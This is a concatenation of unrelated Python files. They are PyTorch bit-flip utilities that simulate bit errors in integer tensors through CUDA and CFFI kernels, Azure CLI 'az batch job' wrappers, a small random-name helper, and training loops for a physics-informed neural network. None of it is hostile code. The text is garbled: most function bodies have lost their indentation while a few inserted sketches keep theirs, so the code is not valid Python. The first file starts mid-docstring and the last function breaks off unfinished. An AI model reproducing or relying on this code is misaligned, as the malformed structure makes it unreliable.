    :param zero_prob: probability to flip a zero
    :type zero_prob: float
    :param one_prob: probability to flip a one
    :type one_prob: float
    :param protected_bits: list of length precision, indicating whether a bit is protected (1) or may be flipped (0)
    :type protected_bits: [int]
    :return: input with random bit flips
    :rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
if rand is None:
rand = torch.rand(list(input.shape) + [precision])
if cuda:
rand = rand.cuda()
if not rand.is_contiguous():
rand = rand.contiguous()
assert (rand.dtype == torch.float)
assert is_cuda(rand) is cuda
assert len(input.shape) + 1 == len(rand.shape), (input.shape, rand.shape)
for d in range(len(input.shape)):
assert input.shape[d] == rand.shape[d], (input.shape, rand.shape, d)
assert rand.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert len(protected_bits) == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
zero_prob = torch.tensor(zero_prob, dtype=torch.float)
one_prob = torch.tensor(one_prob, dtype=torch.float)
protected_bits = torch.tensor(protected_bits, dtype=torch.int32)
if cuda:
zero_prob = zero_prob.cuda()
one_prob = one_prob.cuda()
protected_bits = protected_bits.cuda()
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
len_protected_bits = torch.tensor(len(protected_bits), dtype=torch.int32)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%srandomflip' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
zero_prob.data_ptr(),
one_prob.data_ptr(),
protected_bits.data_ptr(),
len_protected_bits.data_ptr(),
rand.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_zero_prob = cffi.ffi.cast('float*', zero_prob.data_ptr())
_one_prob = cffi.ffi.cast('float*', one_prob.data_ptr())
_protected_bits = cffi.ffi.cast('int*', protected_bits.data_ptr())
_len_protected_bits = cffi.ffi.cast('int*', len_protected_bits.data_ptr())
_rand = cffi.ffi.cast('float*', rand.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32randomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16randomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8randomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8randomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
else:
raise NotImplementedError
return output
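# As a readability aid, a slow CPU reference for the per-bit rule the kernels
# implement, built from this module's own int_bits/int_flip. This assumes both
# helpers use the same bit ordering as the flip kernels (verify before relying
# on it); it is a sketch, not a drop-in replacement:
def _random_flip_reference(input, zero_prob=0.1, one_prob=0.1, protected_bits=None):
    bits = int_bits(input)  # bool, shape input.shape + [precision]
    rand = torch.rand(bits.shape)
    # flip ones with probability one_prob, zeros with probability zero_prob
    flip = torch.where(bits, rand < one_prob, rand < zero_prob)
    if protected_bits is not None:
        # protected (1) bits are never flipped
        flip &= ~torch.tensor(protected_bits, dtype=torch.bool)
    return int_flip(input, flip)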
def int_masked_random_flip(input, mask, zero_prob=0.1, one_prob=0.1, protected_bits=[0]*32, rand=None, precision=None):
"""
    Randomly flip bits in an integer tensor with the given probabilities for flipping zeros and ones.
    The mask decides which values are subject to bit flips and which are not.
    Note that for zero and one probabilities of 0.1, roughly a fraction of 0.075 of the values actually
    changes, compared to roughly 0.092 for the cupy version.

    :param input: input tensor
    :type input: torch.Tensor
    :param mask: mask tensor, determining which values can be changed
    :type mask: torch.Tensor
    :param rand: optional tensor holding a random value per bit, shape is input.shape + [precision]
    :type rand: torch.Tensor
    :param zero_prob: probability to flip a zero
    :type zero_prob: float
    :param one_prob: probability to flip a one
    :type one_prob: float
    :param protected_bits: list of length precision, indicating whether a bit is protected (1) or may be flipped (0)
    :type protected_bits: [int]
    :return: input with random bit flips
    :rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not mask.is_contiguous():
mask = mask.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
if rand is None:
rand = torch.rand(list(input.shape) + [precision])
if cuda:
rand = rand.cuda()
if not rand.is_contiguous():
rand = rand.contiguous()
assert (rand.dtype == torch.float)
assert is_cuda(rand) is cuda
assert (mask.dtype == torch.bool)
assert is_cuda(mask) is cuda
assert len(input.shape) == len(mask.shape), (input.shape, mask.shape)
assert len(input.shape) + 1 == len(rand.shape), (input.shape, rand.shape)
for d in range(len(input.shape)):
assert input.shape[d] == rand.shape[d], (input.shape, rand.shape, d)
assert input.shape[d] == mask.shape[d], (input.shape, mask.shape, d)
assert rand.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert len(protected_bits) == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
zero_prob = torch.tensor(zero_prob, dtype=torch.float)
one_prob = torch.tensor(one_prob, dtype=torch.float)
protected_bits = torch.tensor(protected_bits, dtype=torch.int32)
if cuda:
zero_prob = zero_prob.cuda()
one_prob = one_prob.cuda()
protected_bits = protected_bits.cuda()
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
len_protected_bits = torch.tensor(len(protected_bits), dtype=torch.int32)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%smaskedrandomflip' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
zero_prob.data_ptr(),
one_prob.data_ptr(),
protected_bits.data_ptr(),
len_protected_bits.data_ptr(),
mask.data_ptr(),
rand.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_zero_prob = cffi.ffi.cast('float*', zero_prob.data_ptr())
_one_prob = cffi.ffi.cast('float*', one_prob.data_ptr())
_protected_bits = cffi.ffi.cast('int*', protected_bits.data_ptr())
_len_protected_bits = cffi.ffi.cast('int*', len_protected_bits.data_ptr())
_mask = cffi.ffi.cast('bool*', mask.data_ptr())
_rand = cffi.ffi.cast('float*', rand.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32maskedrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16maskedrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8maskedrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8maskedrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
else:
raise NotImplementedError
return output
def int_individual_random_flip(input, zero_prob, one_prob, protected_bits=[0]*32, rand=None, precision=None):
"""
    Randomly flip bits in an integer tensor with per-bit probabilities for flipping zeros and ones.
    Note that for zero and one probabilities of 0.1, roughly a fraction of 0.075 of the values actually
    changes, compared to roughly 0.092 for the cupy version.

    :param input: input tensor
    :type input: torch.Tensor
    :param rand: optional tensor holding a random value per bit, shape is input.shape + [precision]
    :type rand: torch.Tensor
    :param zero_prob: tensor of per-bit probabilities to flip a zero
    :type zero_prob: torch.Tensor
    :param one_prob: tensor of per-bit probabilities to flip a one
    :type one_prob: torch.Tensor
    :param protected_bits: list of length precision, indicating whether a bit is protected (1) or may be flipped (0)
    :type protected_bits: [int]
    :return: input with random bit flips
    :rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not zero_prob.is_contiguous():
zero_prob = zero_prob.contiguous()
if not one_prob.is_contiguous():
one_prob = one_prob.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
if rand is None:
rand = torch.rand(list(input.shape) + [precision])
if cuda:
rand = rand.cuda()
if not rand.is_contiguous():
rand = rand.contiguous()
assert (rand.dtype == torch.float)
assert is_cuda(rand) is cuda
assert (zero_prob.dtype == torch.float)
assert is_cuda(zero_prob) is cuda
assert (one_prob.dtype == torch.float)
assert is_cuda(one_prob) is cuda
assert len(input.shape) + 1 == len(rand.shape), (input.shape, rand.shape)
assert len(input.shape) + 1 == len(zero_prob.shape), (input.shape, zero_prob.shape)
assert len(input.shape) + 1 == len(one_prob.shape), (input.shape, one_prob.shape)
for d in range(len(input.shape)):
assert input.shape[d] == rand.shape[d], (input.shape, rand.shape, d)
assert input.shape[d] == zero_prob.shape[d], (input.shape, zero_prob.shape, d)
assert input.shape[d] == one_prob.shape[d], (input.shape, one_prob.shape, d)
assert rand.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert zero_prob.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert one_prob.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert len(protected_bits) == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
protected_bits = torch.tensor(protected_bits, dtype=torch.int32)
if cuda:
protected_bits = protected_bits.cuda()
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
len_protected_bits = torch.tensor(len(protected_bits), dtype=torch.int32)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%sindividualrandomflip' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
zero_prob.data_ptr(),
one_prob.data_ptr(),
protected_bits.data_ptr(),
len_protected_bits.data_ptr(),
rand.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_zero_prob = cffi.ffi.cast('float*', zero_prob.data_ptr())
_one_prob = cffi.ffi.cast('float*', one_prob.data_ptr())
_protected_bits = cffi.ffi.cast('int*', protected_bits.data_ptr())
_len_protected_bits = cffi.ffi.cast('int*', len_protected_bits.data_ptr())
_rand = cffi.ffi.cast('float*', rand.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32individualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16individualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8individualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8individualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
else:
raise NotImplementedError
return output
def int_masked_individual_random_flip(input, mask, zero_prob, one_prob, protected_bits=[0]*32, rand=None, precision=None):
"""
    Randomly flip bits in an integer tensor with per-bit probabilities for flipping zeros and ones.
    The mask decides which values are subject to bit flips and which are not.
    Note that for zero and one probabilities of 0.1, roughly a fraction of 0.075 of the values actually
    changes, compared to roughly 0.092 for the cupy version.

    :param input: input tensor
    :type input: torch.Tensor
    :param mask: mask tensor, determining which values can be changed
    :type mask: torch.Tensor
    :param rand: optional tensor holding a random value per bit, shape is input.shape + [precision]
    :type rand: torch.Tensor
    :param zero_prob: tensor of per-bit probabilities to flip a zero
    :type zero_prob: torch.Tensor
    :param one_prob: tensor of per-bit probabilities to flip a one
    :type one_prob: torch.Tensor
    :param protected_bits: list of length precision, indicating whether a bit is protected (1) or may be flipped (0)
    :type protected_bits: [int]
    :return: input with random bit flips
    :rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not mask.is_contiguous():
mask = mask.contiguous()
if not zero_prob.is_contiguous():
zero_prob = zero_prob.contiguous()
if not one_prob.is_contiguous():
one_prob = one_prob.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
if rand is None:
rand = torch.rand(list(input.shape) + [precision])
if cuda:
rand = rand.cuda()
if not rand.is_contiguous():
rand = rand.contiguous()
assert (rand.dtype == torch.float)
assert is_cuda(rand) is cuda
assert (mask.dtype == torch.bool)
assert is_cuda(mask) is cuda
assert (zero_prob.dtype == torch.float)
assert is_cuda(zero_prob) is cuda
assert (one_prob.dtype == torch.float)
assert is_cuda(one_prob) is cuda
assert len(input.shape) == len(mask.shape), (input.shape, mask.shape)
assert len(input.shape) + 1 == len(rand.shape), (input.shape, rand.shape)
assert len(input.shape) + 1 == len(zero_prob.shape), (input.shape, zero_prob.shape)
assert len(input.shape) + 1 == len(one_prob.shape), (input.shape, one_prob.shape)
for d in range(len(input.shape)):
assert input.shape[d] == rand.shape[d], (input.shape, rand.shape, d)
assert input.shape[d] == mask.shape[d], (input.shape, mask.shape, d)
assert input.shape[d] == zero_prob.shape[d], (input.shape, zero_prob.shape, d)
assert input.shape[d] == one_prob.shape[d], (input.shape, one_prob.shape, d)
assert rand.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert zero_prob.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert one_prob.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert len(protected_bits) == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
protected_bits = torch.tensor(protected_bits, dtype=torch.int32)
if cuda:
protected_bits = protected_bits.cuda()
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
len_protected_bits = torch.tensor(len(protected_bits), dtype=torch.int32)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%smaskedindividualrandomflip' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
zero_prob.data_ptr(),
one_prob.data_ptr(),
protected_bits.data_ptr(),
len_protected_bits.data_ptr(),
mask.data_ptr(),
rand.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_zero_prob = cffi.ffi.cast('float*', zero_prob.data_ptr())
_one_prob = cffi.ffi.cast('float*', one_prob.data_ptr())
_protected_bits = cffi.ffi.cast('int*', protected_bits.data_ptr())
_len_protected_bits = cffi.ffi.cast('int*', len_protected_bits.data_ptr())
_mask = cffi.ffi.cast('bool*', mask.data_ptr())
_rand = cffi.ffi.cast('float*', rand.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32maskedindividualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16maskedindividualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8maskedindividualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8maskedindividualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
else:
raise NotImplementedError
return output
def int_bits(input, precision=None):
"""
    Read the individual bits of an integer tensor into a bool tensor.

    :param input: input tensor
    :type input: torch.Tensor
    :return: bit tensor of shape input.shape + [precision]
    :rtype: torch.Tensor
    """
    if not input.is_contiguous():
        input = input.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
output = torch.zeros(list(input.shape) + [precision], dtype=torch.bool)
if cuda:
output = output.cuda()
n = input.nelement()
shape = list(input.shape)
grid, block = cupy.grid_block(shape)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%sbits' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_output = cffi.ffi.cast('bool*', output.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
cffi.lib.cffi_int32bits(_n, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
cffi.lib.cffi_int16bits(_n, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
cffi.lib.cffi_int8bits(_n, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
cffi.lib.cffi_uint8bits(_n, _input, _output)
else:
raise NotImplementedError
return output
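# Quick sanity sketch for int_bits (illustrative only): decomposing a single
# uint8 value into its 8 bits. The bit order within the last dimension is fixed
# by the kernels; the comment below assumes LSB-first, which should be verified.
def _demo_int_bits():
    x = torch.tensor([5], dtype=torch.uint8)  # 0b00000101
    bits = int_bits(x)  # bool tensor of shape [1, 8]
    # LSB-first this reads [True, False, True, False, False, False, False, False]
    return bits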
# =============================================================================
# (dataset quality-signal columns omitted)
# file: test/pyaz/batch/job/__init__.py
# repo: bigdatamoore/py-az-cli @ 54383a4ee7cc77556f6183e74e992eec95b28e01
# license: MIT, stars: 9 (2021-09-24 to 2021-12-24)
# =============================================================================
import json, subprocess
from ...pyaz_utils import get_cli_name, get_params
def create(priority=None, max_parallel_tasks=None, job_max_wall_clock_time=None, job_max_task_retry_count=None, id=None, job_manager_task_id=None, job_manager_task_command_line=None, job_manager_task_resource_files=None, job_manager_task_environment_settings=None, required_slots=None, pool_id=None, metadata=None, uses_task_dependencies=None, json_file=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def delete(job_id, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, yes=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def show(job_id, select=None, expand=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def set(job_id, priority=None, max_parallel_tasks=None, on_all_tasks_complete=None, job_max_wall_clock_time=None, job_max_task_retry_count=None, pool_id=None, metadata=None, json_file=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job set " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def reset(job_id, priority=None, job_max_wall_clock_time=None, job_max_task_retry_count=None, pool_id=None, metadata=None, on_all_tasks_complete=None, json_file=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job reset " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def list(account_name=None, account_key=None, account_endpoint=None, job_schedule_id=None, filter=None, select=None, expand=None):
params = get_params(locals())
command = "az batch job list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def disable(job_id, disable_tasks=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job disable " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def enable(job_id, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job enable " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def stop(job_id, terminate_reason=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job stop " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
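# Hedged usage sketch (illustrative only): these wrappers shell out to the az
# CLI, so `az` must be on PATH and the batch account credentials must be valid;
# the account and job names below are placeholders, not part of this file.
if __name__ == '__main__':
    jobs = list(account_name="mybatchaccount")  # parsed JSON on success
    disable(job_id="job-1", disable_tasks="requeue")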
# =============================================================================
# (dataset quality-signal columns omitted)
# file: randname.py
# repo: liltmagicbox/material_viewer @ cfc9d91ebcf895bb642ce1aa0d0aaad3c97f4085
# license: MIT
# =============================================================================
from random import randint
def barrand6():
    return '_' + str(randint(1, 1000000))
# =============================================================================
# (dataset quality-signal columns omitted)
# file: experiments/KS/experiment_code.py
# repo: GJBoth/MultiTaskPINN @ 8a9bb23b8bfc0d0f678090e015316dbd0cfbf024
# license: MIT, stars: 1 (2022-02-24)
# =============================================================================
from multitaskpinn.utils.tensorboard import Tensorboard
from multitaskpinn.utils.output import progress
from multitaskpinn.model.deepmod import DeepMoD
from typing import Optional
import torch
import time
import numpy as np
from torch.distributions.studentT import StudentT
def train(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
reg_weight,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
loss = torch.sum(MSE + reg_weight * Reg)
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(MSE_test + reg_weight * Reg_test)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
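# Hedged usage sketch (illustrative only): the concrete DeepMoD model, data and
# sparsity scheduler come from elsewhere in this repo; the optimizer settings
# below are assumptions, not prescribed by this file.
#
#     optimizer = torch.optim.Adam(model.parameters(), betas=(0.99, 0.99), amsgrad=True)
#     train(model, data, target, optimizer, sparsity_scheduler,
#           reg_weight=1.0, split=0.8, log_dir='runs/ks', max_iterations=5000)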
def train_mt(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
cutoff = torch.tensor(15.).to(target.device)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
s_capped = torch.min(torch.max(model.s, -cutoff), cutoff)
loss = torch.sum(2 * torch.exp(-s_capped[:, 0]) * MSE + torch.exp(-s_capped[:, 1]) * Reg + torch.sum(s_capped))
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(torch.exp(-s_capped[:, 0]) * MSE_test + torch.exp(-s_capped[:, 1]) * Reg_test + torch.sum(s_capped))
# ====================== Logging =======================
